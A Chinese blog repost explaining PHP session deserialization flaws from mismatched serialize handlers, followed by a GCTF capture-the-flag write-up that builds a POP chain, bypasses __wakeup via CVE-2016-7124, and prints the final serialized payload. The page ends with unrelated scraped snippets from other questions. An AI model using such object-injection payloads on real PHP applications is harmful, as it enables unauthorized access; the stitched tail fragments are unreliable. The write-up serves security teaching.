- ubuntu12.04环境下使用kvm ioctl接口实现最简单的虚拟机
- Ubuntu 通过无线网络安装Ubuntu Server启动系统后连接无线网络的方法
- 在Ubuntu上搭建网桥的方法
- ubuntu 虚拟机上网方式及相关配置详解
CFSDN坚持开源创造价值,我们致力于搭建一个资源共享平台,让每一个IT人在这里找到属于你的精彩世界.
这篇CFSDN的博客文章深入浅析PHP的session反序列化漏洞问题由作者收集整理,如果你对这篇文章有兴趣,记得点赞哟.
在php.ini中存在三项配置项:
1
2
3
4
|
session.save_path=
""
--设置session的存储路径
session.save_handler=
""
--设定用户自定义存储函数,如果想使用PHP内置会话存储机制之外的可以使用本函数(数据库等方式)
session.auto_start boolen --指定会话模块是否在请求开始时启动一个会话,默认为0不启动
session.serialize_handler string --定义用来序列化/反序列化的处理器名字。默认使用php
|
以上的选项就是与PHP中的Session存储和序列话存储有关的选项.
在使用xampp组件安装中,上述的配置项的设置如下:
1
2
3
4
|
session.save_path=
"D: mpp mp"
表明所有的session文件都是存储在xampp/tmp下
session.save_handler=files 表明session是以文件的方式来进行存储的
session.auto_start=0 表明默认不启动session
session.serialize_handler=php 表明session的默认序列话引擎使用的是php序列话引擎
|
在上述的配置中,session.serialize_handler是用来设置session的序列话引擎的,除了默认的PHP引擎之外,还存在其他引擎,不同的引擎所对应的session的存储方式不相同.
php_binary:存储方式是,键名的长度对应的ASCII字符+键名+经过serialize()函数序列化处理的值 。
php:存储方式是,键名+竖线+经过serialize()函数序列处理的值 。
php_serialize(php>5.5.4):存储方式是,经过serialize()函数序列化处理的值 。
在PHP中默认使用的是PHP引擎,如果要修改为其他的引擎,只需要添加代码ini_set('session.serialize_handler', '需要设置的引擎');。示例代码如下:
session 的目录在 /var/lib/php/sessions 中 。
1
2
3
4
5
|
<?php
ini_set
(
'session.serialize_handler'
,
'php_serialize'
);
session_start();
$_SESSION
[
'name'
] =
'spoock'
;
var_dump(
$_SESSION
);
|
在 php_serialize 引擎下,session文件中存储的数据为
1
|
a:1:{s:4:
"name"
;s:6:
"spoock"
;}
|
php 引擎下文件内容为
1
|
name|s:6:
"spoock"
;
|
php_binary 引擎下文件内容为
1
|
names:6:
"spoock"
;
|
由于name的长度是4,4在ASCII表中对应的就是EOT。根据php_binary的存储规则,最后就是names:6:"spoock";。(突然发现ASCII的值为4的字符无法在网页上面显示,这个大家自行去查ASCII表吧) 。
PHP Session中的序列化危害 。
PHP中的Session的实现是没有的问题,危害主要是由于程序员的Session使用不当而引起的.
如果在PHP在反序列化存储的$_SESSION数据时使用的引擎和序列化使用的引擎不一样,会导致数据无法正确第反序列化。通过精心构造的数据包,就可以绕过程序的验证或者是执行一些系统的方法。例如
1
|
$_SESSION
[
'ryat'
] =
'|O:1:"A":1:{s:1:"a";s:2:"xx";}'
;
|
php文件如
1
2
3
4
|
<?php
ini_set
(
'session.serialize_handler'
,
'php_serialize'
);
session_start();
$_SESSION
[
'ryat'
] =
'|O:1:"A":1:{s:1:"a";s:2:"xx";}'
;
|
访问后得到session文件中的内容如下:
1
2
|
root/
var
/lib/php/sessions cat sess_e07gghbkcm0etit02bkjlbhac6
a:1:{s:4:
"ryat"
;s:30:
"|O:1:"
A
":1:{s:1:"
a
";s:2:"
xx";}
|
但此时模拟在其他页面使用不同的php引擎来读取时的内容如下:(默认使用php引擎读取session文件) 。
1
2
3
4
5
6
7
8
9
10
11
|
<?php
#
ini_set
(
'session.serialize_handler'
,
'php_serialize'
);
session_start();
#
$_SESSION
[
'ryat'
] =
'|O:1:"A":1:{s:1:"a";s:2:"xx";}'
;
class
A {
public
$a
=
'aa'
;
function
__wakeup() {
echo
$this
->a;
}
}
// var_dump($_SESSION);
|
访问该页面输出xx 。
1
2
3
4
5
6
7
|
xxarray(1) {
[
"a:1:{s:4:"
ryat
";s:30:"
"]=>
object(A)#1 (1) {
[
"a"
]=>
string(2)
"xx"
}
}
|
这是因为当使用php引擎的时候,php引擎会以|作为作为key和value的分隔符,那么就会将 a:1:{s:4:"ryat";s:30:" 作为SESSION的key,将 O:1:"A":1:{s:1:"a";s:2:"xx";} 作为value,然后进行反序列化,最后就会得到A这个类.
这种由于序列话化和反序列化所使用的不一样的引擎就是造成PHP Session序列话漏洞的原因。漏洞在加载使用php引擎的页面时session去读session中的内容并反序列化导致漏洞触发,不需要任何输出 。
GCTF上的一道session反序列化漏洞分析
index.php中内容为
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
|
<?php
//error_reporting(E_ERROR & ~E_NOTICE);
ini_set
(
'session.serialize_handler'
,
'php_serialize'
);
header(
"content-type;text/html;charset=utf-8"
);
session_start();
if
(isset(
$_GET
[
'src'
])){
$_SESSION
[
'src'
] =
$_GET
[
'src'
];
highlight_file(
__FILE__
);
print_r(
$_SESSION
[
'src'
]);
}
?>
<!DOCTYPE HTML>
<html>
<head>
<meta http-equiv=
"Content-Type"
content=
"text/html; charset=utf-8"
/>
<title>代码审计2</title>
</head>
<body>
|
在php中,经常会使用序列化操作来存取数据,但是在序列化的过程中如果处理不当会带来一些安全隐患.
1
2
3
4
5
6
7
|
<form action=
"./query.php"
method=
"POST"
>
<input type=
"text"
name=
"ticket"
/>
<input type=
"submit"
/>
</form>
<a href=
"./?src=1"
>查看源码</a>
</body>
</html>
|
query.php 中的内容为
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
|
/************************/
/*
//query.php 部分代码
session_start();
header('Look me: edit by vim ~0~')
//......
class TOPA{
public $token;
public $ticket;
public $username;
public $password;
function login(){
//if($this->username == $USERNAME && $this->password == $PASSWORD){ //抱歉
$this->username =='aaaaaaaaaaaaaaaaa' && $this->password == 'bbbbbbbbbbbbbbbbbb'){
return 'key is:{'.$this->token.'}';
}
}
}
class TOPB{
public $obj;
public $attr;
function __construct(){
$this->attr = null;
$this->obj = null;
}
function __toString(){
$this->obj = unserialize($this->attr);
$this->obj->token = $FLAG;
if($this->obj->token === $this->obj->ticket){
return (string)$this->obj;
}
}
}
class TOPC{
public $obj;
public $attr;
function __wakeup(){
$this->attr = null;
$this->obj = null;
}
function __destruct(){
echo $this->attr;
}
}
*/
|
思路如下
这题中我们构造一个TOPC,在析构的时候则会调用echo $this->attr;; 。
将attr赋值为TOPB对象,在echo TOPB的时候会自动调用__tostring魔术方法 。
在__tostring中会调用unserialize($this->attr),因为后面用到token和ticket,所以显然时TOPA对象。后面判断需要$this->obj->token === $this->obj->ticket,所以在序列化的时候进行指针引用使$a->ticket = &$a->token;,即可绕过判断.
至于为什么(string)$this->obj会输出flag,后台写的login可能是__tostring吧.
其中反序列化字符串中会有一个__wakeup()函数清空里面的参数,我问可以通过一个cve来绕过:CVE-2016-7124。将Object中表示数量的字段改成比实际字段大的值即可绕过wakeup函数.
最后的代码为
1
2
3
4
5
6
7
8
9
10
11
|
$testa
=
new
TOPA();
$testc
=
new
TOPC();
$testb
=
new
TOPB();
$testa
->username = 0;
$testa
->password = 0;
$testa
->ticket = &
$testa
->token;
$sa
= serialize(
$testa
);
$testc
->attr =
$testb
;
$testb
->attr =
$sa
;
$test
= serialize(
$testc
);
echo
$test
;
|
最终payload为
1
|
|O:4:
"TOPC"
:3:{s:3:
"obj"
;N;s:4:
"attr"
;O:4:
"TOPB"
:2:{s:3:
"obj"
;N;s:4:
"attr"
;s:84:
"O:4:"
TOPA
":4:{s:5:"
token
";N;s:6:"
ticket
";R:2;s:8:"
username
";i:0;s:8:"
password
";i:0;}"
;}}
|
以上所述是小编给大家介绍的PHP的session反序列化漏洞,希望对大家有所帮助,如果大家有任何疑问请给我留言,小编会及时回复大家的。在此也非常感谢大家对我网站的支持! 。
原文链接:http://www.blogsir.com.cn/safe/371.html?utm_source=tuicool&utm_medium=referral 。
最后此篇关于深入浅析PHP的session反序列化漏洞问题的文章就讲到这里了,如果你想了解更多关于深入浅析PHP的session反序列化漏洞问题的内容请搜索CFSDN的文章或继续浏览相关文章,希望大家以后支持我的博客! 。
最近做一个项目,由于是在别人框架里开发app,导致了很多限制,其中一个就是不能直接引用webservice 。 我们都知道,调用webserivice 最简单的方法就是在 "引用"
这是SDL2代码的一部分 SDL主函数 int main(int argc,char *argv[]) { ... ... bool quit=false; S
c 中的函数: PHPAPI char *php_pcre_replace(char *regex, int regex_len, ch
我有以下映射: public class SecurityMap : ClassMap { public SecurityMap() {
我在vue-lic3中使用了SCSS,但是有一个奇怪的错误,使用/ deep /会报告错误,我不想看到它。 代码运行环境 vue-cli3 + vant + scss 的CSS /deep/ .van
我在深入阅读 C# 时遇到了这个我能理解的内容: 当它被限制为引用类型时,执行的比较类型完全取决于类型参数被限制为什么。 但是不能理解这个: 如果进一步限制派生自重载 == 和 != 运算符的特定类型
Closed. This question is opinion-based。它当前不接受答案。 想改善这个问题吗?更新问题,以便editing this post用事实和引用来回答。 3年前关闭。
有人可以详细介绍关于自赋值的运算符重载中的 *this 和 const 例如: Class& Class::operator=(const Class& other) { a = other.
在向树中插入新节点时,如何填充闭包表的深度/长度列? ancestor 和 descendant 中的值是来自另一个表的 ID,表示要以树结构排列的页面。 关闭表: ancestor desce
现在我正在阅读“深入了解 C#”。缺少的一件事是完成一章后我可以解决的一系列问题。那会帮助我理解我刚刚学到的概念。 哪里可以找到适合 C#3.0 的问题集? 谢谢 最佳答案 你可以试试LINQ 101
TypeScript 给 JavaScript 扩展了类型的语法,我们可以给变量加上类型,在编译期间会做类型检查,配合编辑器还能做更准确的智能提示。此外,TypeScript 还支持了高级类型用
是否有一个单行代码来获取生成器并生成该生成器中的所有元素?例如: def Yearly(year): yield YEARLY_HEADER for month in range(1, 13)
所以我阅读了一些与“什么是方法组”相关的 StackOverflow 问题以及其他互联网文章,它们在底线都说了同样的话——方法组是“一组重载方法” ". 但是,在阅读 Jon Skeet 的“C# 深
有什么方法可以从子组件中获取子组件吗? 想象一下以下组件树: 应用程序 问题 问题选项(包含复选框) 问题选项(包含复选框) 问题选项(包含复选框) 我想从 App 访问问题选项以选中所有复选框。 参
class_eval 和 instance_eval 在定义方法等情况下是完全可以预测的。我也理解类的实例和类的单例(又名特征类)之间的区别。 但是 我无法弄清楚以下唯一的事情:比方说,出于某些策略目
我想出了如何将符号 rwx 部分读取/转换为 421 个八进制部分,这非常简单。但是当涉及到特殊字符时,我感到非常困惑。我们知道 -r-xr---wx 转换为 0543,但 -r-sr---wt 或
我怀疑我系统的 Java 版本有问题。某些应用程序出现段错误或内存不足或存在链接错误。如果我从源代码安装了 JDK,我会做类似“make test”的事情,看看哪些测试失败了。但是,看起来从源代码构建
如何克隆一个 repo(使用 libgit2 ) 我想做什么git clone确实,但有 libgit2 .我可能要问的是什么 git clone确实很深入。 这是我目前正在做的: 初始化一个repo
00、头痛的JS闭包、词法作用域? 被JavaScript的闭包、上下文、嵌套函数、this搞得很头痛,这语言设计的,感觉比较混乱,先勉强理解总结一下😂😂😂.
我开始玩 lubridate R 中的包。我注意到 now(tzone="EST")计算为: [1] "2015-08-25 13:01:08 EST" 而 now(tzone="PST")导致警告:
我是一名优秀的程序员,十分优秀!